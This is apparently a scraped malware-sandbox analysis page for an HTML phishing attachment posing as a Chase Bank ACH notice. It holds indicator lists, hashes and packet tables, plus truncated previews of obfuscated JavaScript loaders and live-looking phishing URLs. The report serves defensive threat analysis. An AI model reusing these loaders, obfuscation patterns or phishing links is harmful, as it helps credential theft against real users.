CLOUDCOMPUTINGDE	https://www.ne16.com/t/4177044/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly93b29kLWRlY2sub3JnL3BkZi85SWRac1p5aTJEeWh3ZUcvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWEM4YXAvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWTJOc1lYSmxRR0psYkd4d1lYSjBibVZ5YzJsdVl5NWpiMjA9	Get hash	malicious	HTMLPhisher	Browse	185.216.70.3
	39219551856425239229659018183199459894710784074224159047793937414398083.exe	Get hash	malicious	GuLoader	Browse	185.216.71.95
	Chase Bank ACH.htm	Get hash	malicious	Unknown	Browse	185.216.70.216
	Encrypted_PaymentAdvice_Reference.html	Get hash	malicious	HTMLPhisher	Browse	185.216.70.216
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	185.216.70.4
	VtMI9Eirot.elf	Get hash	malicious	Unknown	Browse	185.216.70.169
	Yu9EYARrsZ.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	10l8wFuMZV.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	zNkF2ekeds.elf	Get hash	malicious	Mirai	Browse	185.216.70.88
	Se6e7NboAD.elf	Get hash	malicious	Mirai	Browse	185.216.70.88

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTAxOTIyLCJtZXNzYWdlX2lkIjoiMGd4d3poYXc3czloeGZoZWNuNjNuYnFwIzg0YjRlN2VjLTdhZjUtNDU5Yi1hNTYxLWE1ZmVlMTE3NTllNiIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjM3OTIyLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGphbWVzLmZheUBjb3VudHluYXRpb25hbGJhbmsuY29tJnBhdGhzPWFib3ZlJmxpbms9RmF4X091dGxvb2siLCJpbmRpdmlkdWFsX2lkIjoiNDA4YWI4OGRlY2JmNDFjMjRhYTZhMDRlOWU1OWMzZDAifQ.i-tkK1Lnys-MM487ot1MrSYQb6ExLgZNRQbgsH8B2K0	Get hash	malicious	Captcha Phish	Browse	23.204.76.112 20.114.59.183
	http://relevanteduofficelogin.relevantedu.xyz	Get hash	malicious	HTMLPhisher	Browse	23.204.76.112 20.114.59.183
	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	23.204.76.112 20.114.59.183
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	23.204.76.112 20.114.59.183
	https://downloads.locklizard.com/SafeguardPDFViewer_v3.exe	Get hash	malicious	Unknown	Browse	23.204.76.112 20.114.59.183
	https://cdp1.tracking.e360.salesforce.com/click?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiJhMzYwL3Byb2QvNTBhMGYyODg2ZTg4NDA3Y2I1ODUwYmRjOWQwZGIxZTUiLCJjcmVhdGlvbl90aW1lIjoxNzE0MTM3MzAwLCJtZXNzYWdlX2lkIjoiMGd5MGJnNjBqOTJwcmNuZjhhNHNxYWpwIzZjY2RmYjMyLWJiNzgtNGQwNC1hYWYwLTg3MjdkMTg4MjZlMyIsImNoYW5uZWxfdHlwZSI6ImVtYWlsIiwiZXhwIjoxNzQ1NjczMzAwLCJyZWRpcmVjdF91cmwiOiJodHRwczovL3ZtbWVzc2FuZ2VyLnJkb2NtZ2xvYmFsLmNvbS9kb2NzL2luZGV4LnBocD9tYWlsPSUyMGhiYXJ0aGxvd0BzZWN1cnVzdGVjaG5vbG9naWVzLmNvbSZwYXRocz1hYm92ZSZsaW5rPUZheF9PdXRsb29rIiwiaW5kaXZpZHVhbF9pZCI6IjQ0NDY4NzI5YzA1N2Q5ZDJjYzNiYjZlOTc3NDg3MzUyIn0.AryFGbNWOut6hGg1x_WBQ4QL5QU_wggDk6q2PUj7rNI	Get hash	malicious	Captcha Phish	Browse	23.204.76.112 20.114.59.183
	https://srmcorp.tecuidoc.com/?PSZlk=ViP	Get hash	malicious	HTMLPhisher	Browse	23.204.76.112 20.114.59.183
	gq83mrprwy.exe	Get hash	malicious	Xmrig	Browse	23.204.76.112 20.114.59.183
	https://runrun.it/share/form/0GZMCgHSxRh4PBOM	Get hash	malicious	HTMLPhisher	Browse	23.204.76.112 20.114.59.183
	Dragons Dogma 2 v1.0 Plus 36 Trainer.exe	Get hash	malicious	Unknown	Browse	23.204.76.112 20.114.59.183

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	124256
Entropy (8bit):	4.271329036904615
Encrypted:	false
SSDEEP:	768:MKDYqJ2Rhp89g+2+Pvl/VlcGfH1aeWlEVMFF/BnbqEyac4k4VGYEAvqNRLDk1qwD:en/Z1/uJOh1jXE2rXQG
MD5:	B83FC8A60F69713C2F2427532CB0E3CE
SHA1:	FE9000EB2A130E7A62BC335B0A7A899203B97D12
SHA-256:	9CA247E921A91D2D4F6F3DF561288777E832EA5B144254946F1C68A75F6A435D
SHA-512:	3C3B03A7AFB92945AF928B7DBE7C113A2B582DA3CA1680F1434A5E25229F1ECD35DED2A28A8184CBA38A1D3B0A9794196E9E253FDDD3E88FC56418E95CA7F625
Malicious:	false
Reputation:	low
URL:	https://bc1q2a22gd79umarrlvhudct2v5.com/lnk/cloud.js
Preview:	function _0x2226(_0x95da6f,_0x4a7197){var _0x45464=_0xc944();return _0x2226=function(_0x210d9a,_0x4050a2){_0x210d9a=_0x210d9a-(-0x9f5+0xc42+-0x134);var _0x33618f=_0x45464[_0x210d9a];return _0x33618f;},_0x2226(_0x95da6f,_0x4a7197);}var _0x203562=_0x2226;function _0xc944(){var _0x230952=['7D%2E%62%6','8%32%32%30','%63%72%69%','64%73%6F%5','%63%68%28%','%65%74%3D%','%6F%6D%3A%','6%66%7D%61','32%35%72%6','74%7B%6C%6','E%6E%69%6E','%6F%6E%28%','%6F%6E%2F%','2B%2D%30%7','C%64%73%2D','3%6B%67%72','4%65%7D%2E','2%20%2E%72','20%79%6F%7','%61%31%35%','8%69%66%74','65%63%74%6','%6A%73%20%','9%6E%6B%20','D%62%75%74','%6E%63%74%','%70%61%72%','A%45%77%5A','9%39%35%66','3%33%7D%2E','6F%72%64%2','2%65%65%6E','%69%6E%2E%','%6C%65%66%','6%55%53%4D','9%67%2D%62','8%29%7B%2E','7%20%64%69','74%22%20%6','%30%39%3D%','%74%3A%36%','C%61%79%3A','%29%29%2C%','54%46%2B%3','6E%7B%74%7','A%70%5A%72','4%68%65%20','4%2F%7A%55','%74%61%75%','65%6E%74%3','%62%73%41%','2%55%35%45','%2C%53%65%','F%31%2E%30','%3A%2E%38%

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	31
Entropy (8bit):	3.86469832616696
Encrypted:	false
SSDEEP:	3:YBAvZNQaY:YwZNQaY
MD5:	2D7D30EA1C6F925302D2C3ABED382951
SHA1:	5BA6BBC5670C4AF1125CF9AC0AA1CA2811E744D1
SHA-256:	83C09BA9A8DAEDB136F90B17A294CAA90AD471A016E430DF6E229ACB5A81E100
SHA-512:	BCC7AAA8A6A27ADCBD1B3E0FCA73FC1BD727FECEAB34734E99863503D1D50936A8830C0A12D75D187614F318F46B1E67F046E89F5EB6CE727D8433A722E2C525
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"detail":"Method Not Allowed"}

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	21726
Entropy (8bit):	5.445952999493486
Encrypted:	false
SSDEEP:	384:WDvmDWDRD5tDGDrD0vlVk54FS7vG2r5PmhCvnXy5uHERvwgB5NQL4vpZo50J+Pv6:WiaVfKX4
MD5:	9842B200DB0DFFB68C6B53EAACC8C0BC
SHA1:	66B0AFAFC96A0F5AE9DD9E969D0C407200CEC696
SHA-256:	90C4F0951056E5A82B2150C8B3FE6D011A08EA2ABC957453D080B8179504E2D7
SHA-512:	5BEAB744D4F32B8468295C1AD17FBEBB48A73048D357ED5272FB5BEB649DFD05D9AF30DB84E23A0159EB5220F5EB1ED1B12F36E159B33824C7A209645BC4AC28
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7SUc.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7SUc.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7SUc.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100;. font-display: swa

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:	1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (1693), with no line terminators
Entropy (8bit):	5.640002844176086
TrID:	HyperText Markup Language (13008/1) 61.90% HTML Application (8008/1) 38.10%
File name:	Housecallpro Chase Bank ACH.htm
File size:	1'693 bytes
MD5:	8985f94e78f090fd084e6f98936426c0
SHA1:	c95eaaf6d497305d62a0ef7c615774060a638b0d
SHA256:	b50a71b811cf5218aa2746a56d1327b00d8a41bc01dc99711caada0ff912f613
SHA512:	306e20463eec2a7260b7a31b0b12640b46e342b05b30b3fc3b0c9a24d1820b55c56af12d43f4ea77bf3412b1840a0108977d6294a0ef914685070bedbe9e81a6
SSDEEP:	48:DjP+GZqYj7wat5RLxa1c7VTIOfMjdTvEGrhbsZCLwhLog:DjP+GEcrpQdDEGpBLC
TLSH:	0A3152CCBC4150E80B913AE61D3A6849E72FFC0630948B88E508DC817E5DE54E02FBF8
File Content Preview:	<script>const a0Z=a0E;function a0E(N,E){const R=a0N();return a0E=function(S,g){S=S-0x194;let s=R[S];return s;},a0E(N,E);}function a0N(){const p=['40MbgQOl','10044teFiWM','ipt','ite','scr','\x20src=\x22','1444098TTjNnq','888QIPOWD','value3','69076EgijTI','

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 17:59:48.309504986 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 26, 2024 17:59:49.262626886 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 17:59:58.517832041 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:58.517884970 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:58.517940998 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:58.518815041 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:58.518824100 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:58.939985037 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 17:59:59.069133043 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.072833061 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.072840929 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.073859930 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.073921919 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.075542927 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.075623035 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.075726986 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.075731993 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.184560061 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.586993933 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.680355072 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.846651077 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846664906 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846684933 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846695900 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846704006 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846713066 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.846726894 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.846765995 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.847333908 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847341061 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847362041 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847368002 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847378016 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847385883 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 17:59:59.847398996 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 17:59:59.847423077 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.106714010 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.106724024 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.106750011 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.106755972 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.106766939 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.106826067 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.106831074 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.106925011 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.107433081 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.107440948 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.107460022 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.107467890 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.107494116 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.107497931 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.107554913 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.108221054 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.108234882 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.108289957 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.108293056 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.108326912 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.366477966 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.366499901 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.366578102 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.366586924 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.366695881 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.367340088 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367355108 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367419004 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.367423058 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367582083 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.367691994 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367722034 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367749929 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.367753029 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367800951 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.367808104 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:00.367959976 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.375148058 CEST	49733	443	192.168.2.4	185.216.70.216
Apr 26, 2024 18:00:00.375164986 CEST	443	49733	185.216.70.216	192.168.2.4
Apr 26, 2024 18:00:02.442867994 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.442920923 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.442986965 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.443435907 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.443455935 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.466389894 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.466425896 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.466495991 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.466943026 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.466960907 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.724709988 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.724987984 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.725018024 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.726391077 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.726454020 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.916882992 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.917035103 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.917148113 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:02.917164087 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:02.922055006 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.922600985 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.922619104 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.923671007 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.923748970 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.924710989 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:02.924782991 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:02.956691980 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.073548079 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:03.073582888 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:03.074949980 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075139999 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075165033 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075186968 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.075212002 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075253010 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.075385094 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075579882 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075623035 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.075627089 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075947046 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.075993061 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.075999022 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076267958 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076311111 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.076314926 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076487064 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076530933 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.076534986 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076831102 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.076869965 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.076874971 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077055931 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077111006 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.077116013 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077291965 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077332020 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.077336073 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077578068 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.077629089 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.077632904 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078027010 CEST	443	49739	104.17.24.14	192.168.2.4
